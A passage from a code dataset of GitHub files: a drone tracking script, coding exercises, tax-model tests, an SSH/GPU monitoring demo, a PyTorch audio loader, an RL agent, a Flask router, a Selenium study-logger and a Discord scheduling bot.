l = [l1, l2, l3, l4]\n                    \n                    a = [0]*4\n                    b = [0]*4\n                    nn = [0, 1, 2, 3]\n                    for i in range(len(l)):\n                        if l[i] == min(l):\n                            a[0] = x0[i]\n                            b[0] = y0[i]\n                            s = i\n                    nn.remove(s)\n                    j=0\n                    for j in nn:\n                        n=nn.copy()\n                        A = (b[0]-y0[j])/(a[0]-x0[j])\n                        B = b[0] - A*a[0]\n                        n.remove(j)\n                        C = A*x0[n[0]] + B\n                        D = A*x0[n[1]] + B\n                        if C - y0[n[0]] > 0 and D - y0[n[1]] < 0:\n                            a[1] = x0[n[0]]\n                            b[1] = y0[n[0]]\n                            a[3] = x0[n[1]]\n                            b[3] = y0[n[1]]\n                            a[2] = x0[j]\n                            b[2] = y0[j]\n                            break\n                        elif C -y0[n[0]] < 0 and D - y0[n[1]] > 0:\n                            a[3] = x0[n[0]]\n                            b[3] = y0[n[0]]\n                            a[1] = x0[n[1]]\n                            b[1] = y0[n[1]]\n                            a[2] = x0[j]\n                            b[2] = y0[j]\n                            break\n\n                    d1 = np.sqrt((a[0]-a[1])**2+(b[0]-b[1])**2)\n                    d2 = np.sqrt((a[1]-a[2])**2+(b[1]-b[2])**2)\n                    d3 = np.sqrt((a[2]-a[3])**2+(b[2]-b[3])**2)\n                    d4 = np.sqrt((a[3]-a[0])**2+(b[3]-b[0])**2)\n\n                    #s = (d1 + d2 + d3 + d4) / 2\n                    #Sh = np.sqrt((s-d1)*(s-d2)*(s-d3)*(s-d4))\n\n                    #s1 = (d1 + d4 + d5) / 2\n                    #Sh1 = np.sqrt(s1*(s1-d1)*(s1-d4)*(s1-d5))\n                    \n                    #s2 = (d2 + d3 + d5) / 2\n                    #Sh2 = np.sqrt(s2*(s2-d2)*(s2-d3)*(s2-d5))\n\n                    #SH = Sh1 + Sh2\n\n                    #Sg = abs((1/2)*((a[3]-a[0])*(b[1]-b[0])-(a[1]-a[0])*(b[3]-b[0])))+abs((1/2)*((a[1]-a[2])*(b[3]-b[2])-(a[3]-a[2])*(b[1]-b[2])))\n                    #Sw = cv2.countNonZero(G1)\n                    \n                    S1 = d1*d2\n                    S2 = d1*d4\n                    S3 = d3*d2\n                    S4 = d3*d4\n\n                    c1 = (a[0]+a[2])/2\n                    c2 = (b[0]+b[2])/2\n                    c11 = int(c1)\n                    c21 = int(c2)\n                    cv2.circle(image_origin, (c11, c21), 5, (0, 255, 255) , -1)\n\n                    #line1 = cv2.line(image_origin,(c11+100,c21-100),(c11+100,c21+100),1000)\n                    #line2 = cv2.line(image_origin,(c11+100,c21+100),(c11-100,c21+100),1000)\n                    #line3 = cv2.line(image_origin,(c11-100,c21+100),(c11-100,c21-100),1000)\n                    #line4 = cv2.line(image_origin,(c11+100,c21-100),(c11-100,c21-100),1000)\n\n                    cy = shape[0]/2\n                    cy1 = shape[0]/3\n                    cx = shape[1]/2\n\n                    cv2.circle(image_origin, (int(cx), int(cy)), 5, (0, 255, 255) , -1)\n                    #with open(\"0.3m_S1_2020_10_17.txt\", \"a\") as f:\n                    #    result = \"{:.7f}\\\\n\".format(S1)\n                    #    f.write(result)\n\n                #cv2.imshow('img_mask1', Gg) \n                cv2.imshow('image_origin', image_origin)\n                cv2.waitKey(1)\n                \n                if frame.time_base < 1.0/60:\n                    time_base = 1.0/60\n                    #print(\"T:\",time_base)\n                    #print(\"frame\",frame_skip)\n                else:\n                    time_base = frame.time_base\n                    #print(\"T:\",time_base)\n                # compute the frame-skip value\n                frame_skip = (time.time() - start_time) / time_base\n                #print(\"frame\",frame_skip)\n\n    except Exception as ex:\n        exc_type, exc_value, exc_traceback = sys.exc_info() # present info about the currently executing operation\n        traceback.print_exception(exc_type, exc_value, exc_traceback) # print the record of stack frames from the execution\n        print(ex)\n    finally:\n        drone.quit()\n        cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"henrypom97/Urban-Delivery-Drone","sub_path":"control/dronegoodfeaturetrack.py","file_name":"dronegoodfeaturetrack.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"72077019367","text":"def compress_string(s):\n    \"\"\"\n    Compress string. 
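The per-pixel Python loop in the drone script above is correct but slow; the same green-ratio threshold can be expressed as a single vectorized NumPy operation. An equivalent sketch (not a drop-in patch for the file):

```python
import numpy as np

def green_ratio_mask(image_bgr, gray, threshold=0.89):
    # Ratio of the green channel to the grayscale intensity, as above.
    # Like the original, this assumes gray contains no zero pixels.
    ratio = image_bgr[:, :, 1] / gray
    # 1 where the ratio is below the threshold, 0 elsewhere -- the same
    # result as the nested for-loops, computed in one pass.
    return np.uint8(ratio < threshold)
```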
Return compression only if shorter than original string.\n\n    >>> compress_string('aabb')\n    'aabb'\n\n    >>> compress_string( \"aabbb\")\n    'a2b3'\n\n    >>> compress_string(\"aabbbba\")\n    'a2b4a1'\n\n    >>> compress_string(\"AAAaaaBBBbb\")\n    'A3a3B3b2'\n    \"\"\"\n\n    # Strings shorter than two characters cannot be compressed, and the loop\n    # below never runs for them, so return the input unchanged.\n    if len(s) < 2:\n        return s\n\n    new_string = \"\"\n\n    curr_char = None\n    counter = 0\n\n\n    for i in range(1, len(s)):\n        if curr_char is None:\n            curr_char = s[0]\n            counter+=1\n        if curr_char == s[i]:\n            counter+=1\n        else:\n            new_string += (curr_char + str(counter))\n            curr_char = s[i]\n            counter = 1\n        #accounts for the last letter after the loop ends\n        if i == len(s)-1:\n            new_string += (curr_char + str(counter))\n\n    return s if len(new_string) >= len(s) else new_string","repo_name":"m-romberg/cracking-the-coding-interview","sub_path":"arrays-and-strings/1_6_string_compression.py","file_name":"1_6_string_compression.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"13519309126","text":"if True:\n    import datetime\n    import pandas as pd\n    #\n    import python.build.people_3_income_taxish_functions as f4\n    from python.common.misc import num_people\n    import python.common.util as util\n    import python.build.output_io as oio\n    import python.common.common as com\n\n\ndef test_insert_claims_dependents_columns():\n    d = pd.DataFrame(\n        # This combines the input and the [expected] output data.\n        { \"household\"                            : [1,1,1,1,1, 2,2,2,2,2, 3,3,3,3,3, 4,4, 5,5,5,5,5,5,5,5] ,\n          \"dependent\"                            : [0,0,1,1,1, 0,0,0,1,1, 0,0,0,0,1, 0,0, 0,0,0,1,1,1,1,1] ,\n            # whether someone is a dependent\n          \"dependents\"                           : [3,3,3,3,3, 2,2,2,2,2, 1,1,1,1,1, 0,0, 5,5,5,5,5,5,5,5] ,\n            # total number of dependents in household\n          \"rank, labor income\"                   : [1,2,3,4,5, 1,2,3,4,5, 1,2,3,4,5, 1,2, 1,2,3,4,5,6,7,8] ,\n          \"dependents to claim (up to 4)\"        : [3,0,0,0,0, 2,0,0,0,0, 1,0,0,0,0, 0,0, 4,1,0,0,0,0,0,0] ,\n            # corresponds to a tax proposal active as of October 2022.\n          \"claims dependent (labor income tax)\"  : list( map( bool,\n            # corresponds to the status quo as of May 2022.\n            [1,1,0,0,0, 1,1,0,0,0, 1,0,0,0,0, 0,0, 1,1,1,0,0,0,0,0,] ) ) } )\n    def rei( df: pd.DataFrame ) -> pd.DataFrame:\n        return df . reindex( sorted(df.columns), axis=1)\n    d_input = rei( d.drop( columns = [ \"dependents\",\n                                       \"dependents to claim (up to 4)\",\n                                       \"claims dependent (labor income tax)\",\n                                      ] ) )\n    d_intended_output = rei( d )\n    d_output = rei( f4.insert_claims_dependents_columns( d_input ) )\n    # return (d_input, d_intended_output, d_output)\n    assert d_intended_output . equals( d_output )\n\nif True:\n    log = str( datetime.datetime.now() )\n\n    # unit tests\n    test_insert_claims_dependents_columns()\n\n    # integration tests\n    p4 = oio.readUserData(\n        com.subsample,\n        'people_3_income_taxish.' + com.strategy_year_suffix )\n    assert util.near(\n        len(p4),\n        num_people / com.subsample,\n        tol_frac = 1/5 )\n    assert util.unique( p4.columns )\n    assert ( ( p4 [\"tax, ss\"] >=\n               p4 [\"tax, ss, total employee contribs\"] )\n             . 
all () )\n\n oio.test_write( com.subsample\n , \"people_3_income_taxish\"\n , log )\n","repo_name":"ofiscal/tax.co","sub_path":"python/build/people_3_income_taxish_test.py","file_name":"people_3_income_taxish_test.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"169444483","text":"import functools\nclass Solution:\n def convert(self, s: str, numRows: int) -> str:\n \n if numRows == 1:\n return s\n ret = [[] for _ in range(numRows)]\n pattern = numRows*2 - 2\n for i in range(len(s)):\n if i % pattern < numRows:\n ret[i % pattern].append(s[i])\n else:\n ret[pattern - (i % pattern)].append(s[i])\n \n return functools.reduce(lambda a, b : a + b ,[''.join(c) for c in ret])\n \n \n","repo_name":"MingfeiPan/leetcode","sub_path":"string/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28825610875","text":"\"\"\"\n @Author Jay Lee\n A simple demo containing the creation of tmux sessions programatically and\n also writing a command on the remote session.\n The demo also involves extracting the gpu information from nvidia-based GPUs.\n\n I don't have non Nvidia-based GPUs so I wont be able to develop code for other GPUs\n until I get my hands on or access to such machines\n\"\"\"\n\nfrom excite import ssh\nfrom excite.cmd import Tmux\n\n\ndef common_commands(session_name, tasks=[]):\n \"\"\"\n Set of common commands when creating new session\n \"\"\"\n cmds = [\n Tmux.kill_session(session_name),\n Tmux.new_session(session_name),\n Tmux.attach(session_name),\n \"ls -l\",\n ]\n cmds.extend(tasks)\n cmds.append(Tmux.detach())\n return cmds\n\n\ndef print_gpu_info(server_manager):\n \"\"\"\n :param server_manager: Manager object containing a list\n of connections.\n :return:\n \"\"\"\n gpu_info = server_manager.gpu_info()\n space_count = 6\n\n # Print stats\n for server in gpu_info['servers']:\n print(server['name'])\n print(server['stats'])\n for gpu in server['gpu']:\n for key in gpu:\n print(f\"{key}:\\t {gpu[key]}.\")\n print(\"-\" * 30)\n\n # Print manager stats\n max_key = -1\n\n del gpu_info['servers']\n for stats_key in gpu_info.keys():\n max_key = max(max_key, len(stats_key))\n if stats_key == 'free_gpus':\n print(f\"Free GPU: \")\n for item in gpu_info[stats_key][:20]:\n print(f\"Server name: {item['name']}. GPU Index: {item['index']}. 
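The zigzag conversion in the LeetCode solution above walks the string through a cycle of length `2*numRows - 2`; a quick check against the classic example from the problem statement:

```python
# Using the Solution class from the zigzag (6.py) record above.
assert Solution().convert("PAYPALISHIRING", 3) == "PAHNAPLSIIGYIR"
assert Solution().convert("AB", 1) == "AB"  # single row: unchanged
```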
Free memory: {item['free_memory']}\")\n else:\n print(f\"{stats_key}:\", \" \" * (space_count + max_key - len(stats_key)), f\"{gpu_info[stats_key]}\")\n\n\nif __name__ == \"__main__\":\n port = 9999\n username = 'asdasdas'\n password = 'asdasd'\n\n # Server and session info\n servers = [f\"asdasd{i}.snu.ac.kr\" for i in range(1, 8)]\n tmux_session_names = [f\"tmux_session_names{i}\" for i in range(1, 8)]\n\n # Create the ssh connection objects.\n # Each connection represents an ssh connection to a server\n connections = ssh.create_connections(servers, username, password, port=port, is_debug=True)\n # Create sess\n manager = ssh.SshConnectionManager(connections)\n\n # Print GPU info:\n print_gpu_info(manager)\n\n print(manager[0].gpu_info())\n print(manager[1].gpu_info())\n print(manager.gpu_info())\n\n # For all the servers enlisted,\n # perform the simple commands\n # for i, connection in enumerate(manager):\n # # Print connection info\n # print(connection)\n # # Perform the following commands\n # connection.cmd(\n # [\n # Tmux.new_session(tmux_session_names[i]),\n # Tmux.ls(),\n # Tmux.detach()\n # ])\n","repo_name":"JWLee89/excite","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26378197767","text":"import collections\nimport os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom scipy import signal\nfrom scipy.io import wavfile\nfrom sklearn.utils import shuffle\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom .augment import WavAugment\n\ndef load_audio(filename, second=2):\n sample_rate, waveform = wavfile.read(filename)\n if second <= 0:\n return waveform\n\n length = np.int64(sample_rate * second)\n audio_length = waveform.shape[0]\n\n if audio_length <= length:\n shortage = length - audio_length\n waveform = np.pad(waveform, (0, shortage), 'wrap')\n return waveform\n else:\n start = np.int64(random.random()*(audio_length-length))\n return waveform[start:start+length].copy()\n\nclass Train_Dataset(Dataset):\n def __init__(self, train_csv_path, noise_csv_path, second, spk_utt=200, num_per_speaker=1, **kwargs):\n self.second = second\n\n df = pd.read_csv(train_csv_path)\n data_labels = df[\"utt_spk_int_labels\"].values\n data_paths = df[\"utt_paths\"].values\n data_labels, data_paths = shuffle(data_labels, data_paths)\n\n df = pd.read_csv(noise_csv_path)\n noise_paths = df[\"utt_paths\"].values\n self.wav_aug = WavAugment(noise_paths)\n\n table = {}\n for idx, label in enumerate(data_labels):\n if label not in table:\n table[label] = []\n table[label].append(data_paths[idx])\n\n self.labels = []\n self.paths = []\n for _ in range(spk_utt//num_per_speaker):\n for key, val in table.items():\n for _ in range(num_per_speaker):\n idx = random.randint(0, len(val)-1)\n self.labels.append(key)\n self.paths.append(val[idx])\n print(\"Train Dataset load {} speakers\".format(len(set(data_labels))))\n print(\"Train Dataset load {} utterance\".format(len(self.labels)))\n\n def __getitem__(self, index):\n waveform = load_audio(self.paths[index], self.second)\n\t\t#aug_idx = np.random.randint(0, 3)\n #if aug_idx == 1:\n # waveform = self.wav_aug.change_volum(waveform)\n #elif aug_idx == 2:\n # waveform = self.wav_aug.add_gaussian_noise(waveform)\n #elif aug_idx == 3:\n # waveform = self.wav_aug.add_real_noise(waveform)\n return torch.FloatTensor(waveform), self.labels[index]\n\n def __len__(self):\n return 
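`load_audio` in the dataset loader above either wrap-pads short clips or randomly crops long ones to exactly `sample_rate * second` samples; the padding branch can be sanity-checked on a toy array (illustrative values only):

```python
import numpy as np

waveform = np.arange(5)          # a 5-sample "clip"
target_len = 8
shortage = target_len - len(waveform)
padded = np.pad(waveform, (0, shortage), 'wrap')
# 'wrap' repeats the clip from its start: 0 1 2 3 4 0 1 2
assert list(padded) == [0, 1, 2, 3, 4, 0, 1, 2]
```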
len(self.paths)\n\n\nclass Evaluation_Dataset(Dataset):\n def __init__(self, paths, second=-1, **kwargs):\n self.paths = paths\n self.second = second\n print(\"load {} utterance\".format(len(self.paths)))\n\n def __getitem__(self, index):\n waveform = load_audio(self.paths[index], self.second)\n return torch.FloatTensor(waveform), self.paths[index]\n\n def __len__(self):\n return len(self.paths)\n","repo_name":"thuhcsi/torch_speaker","sub_path":"torch_speaker/audio/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"31743115043","text":"import torch\nimport torch.optim as optim\nfrom torch.utils.tensorboard import SummaryWriter\nimport numpy as np\n\nfrom src.Configuration.StaticConf import StaticConf\nfrom src.Model.Critic import Critic\nfrom src.Model.Actor import Actor\nfrom src.Model.ActorCritic import ActorCritic\nfrom src.NetworkEnv import NetworkEnv\nfrom src.PrioritizedReplay import PrioritizedReplayMemory\n\n\nclass A2C_Combined_Agent_Reinforce():\n # , experience_replay_size, priority_alpha, priority_beta_start, priority_beta_frames\n def __init__(self, models_path):\n # Hyper params:\n self.discount_factor = 0.9\n self.lr = 1e-3\n self.num_steps = 10\n self.device = StaticConf.getInstance().conf_values.device\n self.num_actions = StaticConf.getInstance().conf_values.num_actions\n self.num_episodes = 100\n self.episode_idx = 0\n\n self.actor_critic_model = ActorCritic(self.device, self.num_actions).to(self.device)\n self.optimizer = optim.Adam(self.actor_critic_model.parameters(), self.lr)\n\n self.env = NetworkEnv(models_path, StaticConf.getInstance().conf_values.can_do_more_then_one_loop)\n\n def compute_returns(self, next_value, rewards, masks, gamma=0.99):\n R = next_value\n returns = []\n for step in reversed(range(len(rewards))):\n R = rewards[step] + gamma * R * masks[step]\n returns.insert(0, R)\n return returns\n\n def train(self):\n writer = SummaryWriter()\n frame_idx = 0\n\n all_rewards_episodes = []\n max_reward_in_all_episodes = -np.inf\n reward_not_improving = False\n min_epochs = 100\n action_to_compression = StaticConf.getInstance().conf_values.action_to_compression_rate\n\n while self.episode_idx < min_epochs or (not reward_not_improving):\n print(\"Episode {}/{}\".format(self.episode_idx, self.num_episodes))\n state = self.env.reset()\n log_probs = []\n values = []\n rewards = []\n masks = []\n\n # rollout trajectory\n for _ in range(self.num_steps):\n dist, value = self.actor_critic_model(state)\n\n action = dist.sample()\n compression_rate = action_to_compression[action.cpu().numpy()[0]]\n next_state, reward, done = self.env.step(compression_rate)\n\n log_prob = dist.log_prob(action)\n\n log_probs.append(log_prob)\n values.append(value)\n rewards.append(torch.FloatTensor([reward]).unsqueeze(1).to(self.device))\n masks.append(torch.FloatTensor([1 - done]).unsqueeze(1).to(self.device))\n\n state = next_state\n\n if done:\n break\n\n writer.add_scalar('Total Reward in Episode', sum(rewards), self.episode_idx)\n self.episode_idx += 1\n # next_state = torch.FloatTensor(next_state).to(self.device)\n returns = self.compute_returns(0, rewards, masks)\n\n log_probs = torch.cat(log_probs)\n returns = torch.cat(returns).detach()\n values = torch.cat(values)\n\n advantage = returns - values\n\n actor_loss = -(log_probs * advantage.detach()).mean()\n critic_loss = advantage.pow(2).mean()\n\n writer.add_scalar('Actor Loss', 
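`compute_returns` in the A2C agent above folds rewards backward, with the done mask zeroing the bootstrap at terminal steps. A worked example with made-up numbers, re-implemented on plain floats:

```python
def compute_returns(next_value, rewards, masks, gamma=0.5):
    # Same recurrence as the method above, on plain Python floats.
    R = next_value
    returns = []
    for step in reversed(range(len(rewards))):
        R = rewards[step] + gamma * R * masks[step]
        returns.insert(0, R)
    return returns

# Episode of three steps, terminal at the last one (mask 0 cuts bootstrap).
assert compute_returns(10.0, [1.0, 1.0, 1.0], [1, 1, 0]) == [1.75, 1.5, 1.0]
```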
v(actor_loss), self.episode_idx)\n writer.add_scalar('Critic Loss', v(critic_loss), self.episode_idx)\n\n # loss = actor_loss + 0.5 * critic_loss - 0.001 * entropy\n # loss_val = loss.data.detach().cpu().numpy().min()\n # writer.add_scalar('Loss', loss_val, self.episode_idx)\n\n total_loss = actor_loss + critic_loss\n\n self.optimizer.zero_grad()\n total_loss.backward()\n self.optimizer.step()\n\n all_rewards_episodes.append(returns[-1])\n curr_reward = all_rewards_episodes[-1]\n\n if max_reward_in_all_episodes < v(curr_reward):\n max_reward_in_all_episodes = v(curr_reward)\n\n if len(all_rewards_episodes) > min_epochs and max_reward_in_all_episodes >= max(all_rewards_episodes[-20:]):\n reward_not_improving = True\n\ndef v(a):\n return a.data.detach().cpu().numpy().min()","repo_name":"liorhirsch/NEON-CopressionAgent","sub_path":"src/A2C_Combined_Agent_Reinforce.py","file_name":"A2C_Combined_Agent_Reinforce.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"29543329782","text":"from controllers import invocation_controller\nfrom flask import Blueprint, jsonify, request\nfrom flask_api import status\nimport logging\nimport traceback\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\ninvocation_router = Blueprint(\"invocation_router\", __name__)\n\n# Controllers\nic = invocation_controller.InvocationController()\n\ndef __getStatusCode(response):\n if response[\"status\"] == 200:\n tmp_status = status.HTTP_200_OK\n elif response[\"status\"] == 400:\n tmp_status = status.HTTP_400_BAD_REQUEST\n elif response[\"status\"] == 401:\n tmp_status = status.HTTP_401_UNAUTHORIZED\n elif response[\"status\"] == 422:\n tmp_status = status.HTTP_200_OK\n elif response[\"status\"] == 500:\n tmp_status = status.HTTP_500_INTERNAL_SERVER_ERROR\n elif response[\"status\"] == 501:\n tmp_status = status.HTTP_501_NOT_IMPLEMENTED\n else:\n tmp_status = status.HTTP_500_INTERNAL_SERVER_ERROR\n return tmp_status\n\n@invocation_router.route(\"\", methods=['POST'])\ndef index():\n try:\n request_body = request.get_data()\n\n logger.info(\"Input: {}\".format(request_body))\n logger.info(\"type: {}\".format(type(request_body)))\n\n request_body = request_body.decode(\"utf-8\")\n\n results = []\n\n logger.info(\"Request: {}\".format(request_body))\n\n X = ic.input_handler(request_body)\n\n prediction = ic.predict_fn(X)\n\n results.append(ic.output_handler(prediction))\n\n return \",\".join(results)\n except Exception as e:\n stacktrace = traceback.format_exc()\n logger.error(\"{}\".format(stacktrace))\n\n raise e","repo_name":"brunopistone/sm-end-to-end-mlops","sub_path":"seed_code/01-ml-deploy/algorithms/inference-custom-container/src/routers/invocation_router.py","file_name":"invocation_router.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15508203711","text":"import sys\nimport normal\nimport auth\nimport messages\n\n\n\nclass registry:\n def __init__(self, app):\n self.app = app\n self._registry = {}\n self.noHandlers = set()\n self._is_alive = True\n\n def handleEvent(self, event):\n if event['@type'] not in self._registry:\n print('no handler for event type:', event['@type'])\n self.noHandlers.add(event['@type'])\n # handle an incoming update or an answer to a previously sent\n # request\n print(event)\n sys.stdout.flush()\n return\n self._call_handlers(event)\n\n def 
add_handler_class(self, handler):\n handler_instance = handler(self.app)\n if hasattr(handler, 'target') and handler.target:\n self._add_handler(handler.target, handler_instance)\n if hasattr(handler, 'targets') and handler.targets and isinstance(handler.targets, list):\n for t in handler.targets:\n self._add_handler(t, handler_instance)\n return handler_instance\n\n def _add_handler(self, name, handler_instance):\n if name not in self._registry:\n self._registry[name] = []\n self._registry[name].append(handler_instance)\n\n def _call_handlers(self, event):\n handlers = self._registry[event['@type']]\n for handler in handlers:\n handler.handle(event)\n\n def __del__(self):\n self._on_del()\n\n def _on_del(self):\n print('no handlers: ', self.noHandlers)\n \n def terminate(self):\n self._is_alive = False\n\n\ndef register_all(app):\n r = registry(app)\n r.add_handler_class(auth.handler)\n r.add_handler_class(normal.forget_handler)\n r.add_handler_class(normal.print_handler)\n # r.add_handler_class(messages.messages_handler)\n return r\n","repo_name":"wusisu/tg-client","sub_path":"registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732031207","text":"from selenium import webdriver\nfrom datetime import timedelta\nfrom user_info_screen import SimpleScreen\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\n\n\ndef formatVideoDuration(videoDuration):\n hourPlaces = \"\" if len(videoDuration) > 5 else \"00:\"\n videoDuration = f\"{hourPlaces}{videoDuration}\"\n return videoDuration.split(':')[::-1]\n\n\ndef clickBySelector(selector, seconds=1):\n sleep(seconds)\n element = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, selector)))\n element.click()\n\n\ndef getAllElementsByClassName(className, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, className)))\n\n\ndef getElementByID(elementID, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_element_located((By.ID, elementID)))\n\n\ndef getElementTextBySelector(selector, seconds=1):\n sleep(seconds)\n return wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, selector))).text\n\n\ndef sendTextOnElementById(elementID, text):\n driver.find_element_by_id(elementID).clear()\n driver.find_element_by_id(elementID).send_keys(text)\n\n\ndef createChromeInstanceWithAddBlock():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_extension(r\"C:\\Projects\\Python\\adblock.crx\")\n return webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n\n\nscreen = SimpleScreen()\nvideoURL, email, password, option = screen.openScreen()\nscreen.closeWindow()\n\ndriver = createChromeInstanceWithAddBlock()\nurl = videoURL\ndriver.get(url)\nwait = WebDriverWait(driver, 10)\n\nvideoTitle = getElementTextBySelector(\"h1.title.style-scope.ytd-video-primary-info-renderer\")\nvideoDuration = getElementTextBySelector(\"span.ytp-time-duration\")\n\ndriver.get(\"https://aprovadoapp.com/#\")\n\nclickBySelector(\"a.btn.btn-link.dropdown-toggle\")\n\nsendTextOnElementById('email', email)\nsendTextOnElementById('senha', password)\nclickBySelector(\".btn.btn-success.btnLogin.__tab-campo\")\n\nclickBySelector(\"ul.nav > 
li:nth-child(3)\") # Activities\nclickBySelector(\"button.btn.btn-info.__tab-campo\") # Register New Activity\nclickBySelector(\"div.btn-group > button\") # Choose Subject\nclickBySelector(\"ul.dropdown-menu.dropMateria.__tab-campo > li:nth-child(4)\")\n\n# Choose Content\nclickBySelector(\"div.control-group:nth-child(3) > div.controls > div.btn-group > button\")\nclickBySelector(option)\n\nhora, minuto, segundo = getAllElementsByClassName(\"input.formDuracao\")\nsplitSegundo, splitMinuto, splitHora = formatVideoDuration(videoDuration)\nhora.send_keys(splitHora)\nminuto.send_keys(splitMinuto)\nsegundo.send_keys(splitSegundo)\n\nanotacoes = getElementByID(\"__atividade-cadasteditar-anotacoes\")\nanotacoes.send_keys(videoTitle)\nclickBySelector(\"button.btn.btn-success.__tab-campo\")\nsleep(2)\ndriver.quit()\n","repo_name":"gleisonkz/python-college-lessons","sub_path":"automate-post/selenium-test.py","file_name":"selenium-test.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2237347016","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport json\r\nimport pandas as pd\r\nfrom datetime import date\r\nfrom datetime import timedelta\r\nfrom datetime import datetime\r\nfrom dateutil import parser\r\n\r\nbot = commands.Bot(command_prefix= '%')\r\n\r\n@bot.event\r\nasync def on_ready():\r\n    print('---------- SERVER HAS STARTED ---------')\r\n    await bot.wait_until_ready()\r\n    trigger.start()\r\n\r\n@tasks.loop(seconds = 45)\r\nasync def trigger():\r\n    with open('Settings.json') as f:\r\n        s = json.load(f)\r\n    \r\n    if not 'TIME1' in s or not 'TIME2' in s or not 'COMMAND' in s or not 'Channel' in s:\r\n        return\r\n    \r\n    try:\r\n        tm = s['TIME1']\r\n        t1 = parser.parse(str(tm))\r\n        t2 = parser.parse(str(datetime.now().strftime('%d/%m/%y %H:%M:%S')))\r\n        t3 = t1 - t2\r\n        t3 = round(t3.total_seconds())\r\n        print(t3)\r\n        if t3 <= 0:\r\n            cmd = s['COMMAND']\r\n            channel = await bot.fetch_channel(s['Channel'])\r\n            msg = await channel.send(cmd)\r\n            #await msg.delete()\r\n            dt = datetime.strptime(tm, '%d/%m/%y %H:%M:%S')\r\n            dt = dt + timedelta(days = 1)\r\n            s['TIME1'] = str(dt)\r\n            with open('Settings.json','w') as f:\r\n                json.dump(s,f,indent = 3)\r\n\r\n        tm = s['TIME2']\r\n        t1 = parser.parse(str(tm))\r\n        t2 = parser.parse(str(datetime.now().strftime('%d/%m/%y %H:%M:%S')))\r\n        t3 = t1 - t2\r\n        t3 = round(t3.total_seconds())\r\n        print(t3)\r\n        if t3 <= 0:\r\n            cmd = s['COMMAND']\r\n            channel = await bot.fetch_channel(s['Channel'])\r\n            msg = await channel.send(cmd)\r\n            #await msg.delete()\r\n            dt = datetime.strptime(tm, '%d/%m/%y %H:%M:%S')\r\n            dt = dt + timedelta(days = 1)\r\n            s['TIME2'] = str(dt)\r\n            with open('Settings.json','w') as f:\r\n                json.dump(s,f,indent = 3)\r\n        \r\n\r\n    except Exception as e:\r\n        print(e)\r\n        return\r\n    \r\n\r\n@bot.command()\r\nasync def setchannel(ctx,channel:discord.TextChannel = None):\r\n    if not channel:\r\n        await ctx.send(':information_source: Usage: !setchannel `#channel`')\r\n        return\r\n\r\n\r\n    with open('Settings.json', 'r') as f:\r\n        settings = json.load(f)\r\n\r\n    settings['Channel'] = channel.id\r\n\r\n    with open('Settings.json','w') as f:\r\n        json.dump(settings,f,indent = 3)\r\n    \r\n    await ctx.send(':white_check_mark: Channel has been set') \r\n\r\n@bot.command()\r\nasync def settime(ctx,var1:str = None,var2:str = None):\r\n    if not var1 or not var2:\r\n        await ctx.send(':information_source: Usage: !settime `HH:MM` `HH:MM` `(EXAMPLE: 04:10 HH:MM)`')\r\n        return\r\n    \r\n    if 
var2.count(':') > 1:\r\n        await ctx.send(':warning: Invalid Format')\r\n        return\r\n\r\n    if var1.count(':') > 1:\r\n        await ctx.send(':warning: Invalid Format')\r\n        return\r\n\r\n    with open('Settings.json', 'r') as f:\r\n        settings = json.load(f)\r\n    \r\n    dt = date.today()  # date only, so appending the HH:MM string parses cleanly\r\n    a = pd.to_datetime(str(dt)+' '+ str(var1))\r\n    a = a.strftime('%d/%m/%y %H:%M:%S')\r\n    settings['TIME1'] = a\r\n    dt = date.today()\r\n    b = pd.to_datetime(str(dt)+' '+ str(var2))\r\n    b = b.strftime('%d/%m/%y %H:%M:%S')\r\n    settings['TIME2'] = b\r\n\r\n    with open('Settings.json','w') as f:\r\n        json.dump(settings,f,indent = 3)\r\n    \r\n    await ctx.send(':white_check_mark: Time has been set') \r\n    \r\n@bot.command()\r\nasync def setcommand(ctx,*,var:str = None):\r\n    if not var:\r\n        await ctx.send(':information_source: Usage: !setcommand `command`')\r\n        return\r\n    \r\n    with open('Settings.json') as f:\r\n        settings = json.load(f)\r\n    \r\n    settings['COMMAND'] = var\r\n\r\n    with open('Settings.json','w') as 